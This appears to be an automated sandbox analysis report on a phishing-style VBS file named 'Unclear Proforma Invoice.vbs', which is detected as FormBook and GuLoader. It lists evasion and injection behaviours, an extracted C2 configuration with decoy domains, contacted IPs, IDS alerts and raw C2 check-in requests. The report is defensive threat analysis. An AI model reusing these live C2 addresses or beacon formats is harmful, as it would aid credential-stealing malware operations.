Windows Analysis Report
Unclear Proforma Invoice.vbs

Overview

General Information

Sample Name: Unclear Proforma Invoice.vbs
Analysis ID: 680487
MD5: 2ccae65c60d12ce9d0d097db0d58cefa
SHA1: 4114f1b5a7c5ded759ca00fcbb10acfb4c72085f
SHA256: d85deda96531cdada16f3d37ee1ad279289c60509f37b28e0d0dac0bd7e4c4ed
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Connects to several IPs in different countries
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 30.2.firefox.exe.2f1d7970.0.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 30.0.firefox.exe.2f1d7970.0.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 30.0.firefox.exe.2f1d7970.1.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 23.2.rundll32.exe.57a7970.4.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 23.2.rundll32.exe.36008a0.1.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ymsb.info/tuid/"], "decoy": ["qimazii2893.com", "secureartist.com", "fullrmc.cloud", "hydroknow.com", "komerco-latam.com", "linuxizes.com", "onlinevoting.online", "et-secure.info", "shoolinart.net", "idealofta.store", "tresbichos.com", "worldbrands.wine", "susanne-morel-autorin.com", "blueonb.com", "programmedsolution.com", "eo3ql7.xyz", "digitalmarketingdegreemx.com", "contactar-parking.com", "billypainter.com", "pinitlabs.com", "theconsciouskart.com", "growonweb3.com", "laforet.info", "bynecessiti.com", "sowgh.com", "studioriopelle.com", "edico-al.com", "ghanesa.xyz", "emitacademy.com", "xc8b49c6mnmdts.xyz", "kondo0071.com", "wwwf2dni.com", "hikingtaibah.com", "muziclips.com", "vivi-italiano.com", "gebilay.com", "mojawapo.com", "aia-art.com", "spurgadgetclubtoday.com", "we-gamble.net", "kukula.biz", "maximilianvonah.com", "chaosschizophrenia.com", "thrrealestate.com", "minotaur.network", "crayative.com", "itsfindia.online", "beachandlakeresort.net", "psoriasis-cure.info", "receiveprim.online", "coolarts.xyz", "147bronzeway.com", "ap-render.com", "perspectiive.com", "5phutthuocbainhenhang.com", "vtubber.com", "motorcyclehelmets.win", "hongkongfun.site", "cecilialederer.com", "productislandsize.xyz", "5111.site", "conversacion.online", "svgjp.com", "detalinb.online"]}
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb source: powershell.exe, 00000004.00000002.3064710007.00000000054BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ielowutil.pdbGCTL source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb| source: powershell.exe, 00000004.00000002.3056176789.0000000005352000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ielowutil.exe, ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ielowutil.pdb source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.150.61.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.155.228 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 145.14.153.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.51.250 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.185.179 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.210.161.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 89.46.108.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.18.208.202 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.95.96.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.23.227.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.178 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 130.211.17.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.80.183.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.21.87.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.95.160.71 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.15.163.148 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.251.39.115 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 13.248.216.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.39.116 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.ghanesa.xyz
Source: DNS query: www.coolarts.xyz
Source: DNS query: www.xc8b49c6mnmdts.xyz
Source: DNS query: www.productislandsize.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.ymsb.info/tuid/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=csUEPuyljQauctU/Z8NbC9ms5fC6XWDYEeq9yCIh8wbky0EJAlqn2MT949GlS8zP8lU0&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.maximilianvonah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=83varyKolJl8CknPQYlgcSGzNVcyrkZOB+D5ZpiMClZzhWRqo67UpTDjwxWvk8XKYz02 HTTP/1.1Host: www.emitacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=gaITN7i6/i636J8ZdAepXbFiroAuKTRwrMdc4y4CfBKs7kJVyv+3PWgk2/xmwUEu5s/a&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.muziclips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=p0pyYx380zTi+CiqScB4rLgyoRdRZyFFdRM5Rh8HyCuUL1S9LlJi1JnCbSa7CQi/RAeh&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.svgjp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Xot5lTp2K0ClnYt2dL3qfCxcaVN+/32Qk6xa6/2CoOF7guyvNDwTfZphG6kmH2ULd7pQ&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.147bronzeway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=HIOGqwzZ3Isl7OEwvKn7zxoCIrzNSH0uht2lzyEyFHfgP4651xyJdMCZXys0BRyGrE8f&8pB=3fY8ljB8rp-H HTTP/1.1Host: www.wwwf2dni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=Sp+Vnoj41xF+X27kbZ2gbhhmlpTYO/ymXHQnMWpJpfoG8qqLVUKSMWMbMwd5uBvOkHI+&APPTx=9r9PSR HTTP/1.1Host: www.blueonb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=WEOQpGNSR38PhgWGQI/4C8NMlFMwGI3qKGQVHk5AxuPmXhsKWgjXW9kcijjoxdm/j8Qu&APPTx=9r9PSR HTTP/1.1Host: www.mojawapo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=cJ4k7DdOtYQngKRIFYz9xfmhcqtIvpGa85+jixf523tlwbXsspzXRN02o1TtG1NqJ3tW&APPTx=9r9PSR HTTP/1.1Host: www.ghanesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=uDqjMC0TPYTc8b3BnUYVD5r+dOFIeilgQYFIqhS/31oxMeb2xRi82/WbnXFAxC3dxs3o HTTP/1.1Host: www.linuxizes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&APPTx=9r9PSR HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=mHFj8MSWDx8nkU1eAV++NnKhhWbL51TVGCJDIAbvrDEUS4qoSy90C4E1UO2kwJf1rSvR&APPTx=9r9PSR HTTP/1.1Host: www.hikingtaibah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vocXnNkofrtqV2skOi0toh6MZkzBPgY3NaQb1h7517U8PmTkl0G2bMX+HFjiIYqpZAQ5&APPTx=9r9PSR HTTP/1.1Host: www.xc8b49c6mnmdts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=Il3LuUn17XOwO1L66Bn3hjajRgSpI6QuPLSUULkpfr+VyFXt3qGq+SpnJy79y37sHeXr HTTP/1.1Host: www.worldbrands.wineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=CvVARU9fNp+vKMKeLa6AXw4JheY799aWEuKndqaVaC/gFtqDUvqUT5Zi2l9zF52EiAp1&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.programmedsolution.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=LeABM0dRx+cjh3zMeGVoLpl9dcpUDuhE6Ym2dCR4YXuE8jour2rN+gEOINsGd1piKr34&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.secureartist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=x1lqSWX2LKO1JKV9bkchYXFCTPqYoW8UylSztnXFuZ2/7+2KqJfWLK3RcwQMnMv5S2vv HTTP/1.1Host: www.ymsb.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=9gXeVPWqRuIX9bIiSDPSAo7Wpwb+1c/G4dykJbOMN5RD0q8y2Pxv3NPChbg6lQ1LsmOi&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.coolarts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=ZWTx79zL1WMN2pQcyBYApaV2+B3RRlV7SjHEUZJPfkwT7h+aiOtTufuSzn8LCa71qLhI HTTP/1.1Host: www.ap-render.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=5V7M8j5VuGkiy9NL3tIypAJy22VFPCeBH5Oh5nibDDbINvkaWpZ6bb8s5rlg19isjBzt&M8s=w86DJpgx5FYlUfRP HTTP/1.1Host: www.receiveprim.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?M8s=w86DJpgx5FYlUfRP&m4bd=mghAatraeoVXXTpIg6GKnKl23LbAAQF/82d90oG2Rt9sZLGICR2WykimnZjjCp2p0vtb HTTP/1.1Host: www.itsfindia.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tuid/?m4bd=vE0t2WxjBi8H4KsoCXQPFaaEcnaL0cW4rsHN0mKSQSi6rgkDy1GsjEniIX065GWycDne&UlCp=CJEhZPH HTTP/1.1Host: www.vtubber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.150.61.226 103.150.61.226
Source: Joe Sandbox View IP Address: 66.29.155.228 66.29.155.228
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:44:34 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 6e 75 78 69 7a 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.linuxizes.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 08 Aug 2022 15:45:36 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
